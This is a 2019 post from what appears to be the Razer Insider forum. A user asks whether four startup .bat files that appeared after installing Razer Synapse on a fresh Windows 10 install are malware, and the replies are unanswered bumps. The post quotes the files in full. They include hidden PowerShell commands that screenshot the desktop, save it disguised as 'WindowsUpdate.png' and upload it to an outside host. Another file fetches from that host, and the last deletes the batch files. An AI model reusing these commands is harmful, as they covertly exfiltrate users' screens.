after fresh install of win10 , windows downloading Razer Synapse automatically insert a malware | Razer Insider

after fresh install of win10 , windows downloading Razer Synapse automatically insert a malware

  • 22 April 2019
  • 6 replies
  • 5 views

i had this 4 .bat files created on start run with weird code powershell that send info to a remote server.
after downloading and installing fresh copy of windows, i found out its Razer Synapse that create those files
do its look really suspension

here is a topic that have all the info:
https://security.stackexchange.com/questions/207769/installed-a-fresh-copy-of-win10-and-i-have-powershell-script-sending-info-to-htt#comment418996_207769

after sync for the first time its create 4 bat files with those codes:

LVTUSIX.bat:

powershell -windowstyle hidden -Command "[void][reflection.assembly]::loadwithpartialname('system.windows.forms'); [system.windows.forms.sendkeys]::sendwait('{PRTSC}'); Get-Clipboard -Format Image | ForEach-Object -MemberName Save -ArgumentList "$env:APPDATA\\WindowsUpdate.png"; invoke-webrequest -method put -infile "$env:APPDATA\\WindowsUpdate.png" https://rip.rblx.dev/c/"

LVTUSIXd.bat:

powershell -windowstyle hidden -Command "[void][reflection.assembly]::loadwithpartialname('system.windows.forms'); [system.windows.forms.sendkeys]::sendwait('{PRTSC}'); Get-Clipboard -Format Image | ForEach-Object -MemberName Save -ArgumentList "$env:APPDATA\\WindowsUpdate.png"; invoke-webrequest -method put -infile "$env:APPDATA\\WindowsUpdate.png" https://rip.rblx.dev/c/"

LVTUSIXdd.bat:

powershell -windowstyle hidden -Command "& {&invoke-webrequest -method get https://c.rblx.dev/c/}

LVTUSIXddx.bat:

del *.bat

what are those powershell code to this rblx.dev ?

This topic has been closed for comments

6 Replies

help? is this is malware ?
bumping please help
support? no respond in a full week
help? i need somebody help! not just anybody
great support?
help i need somebody!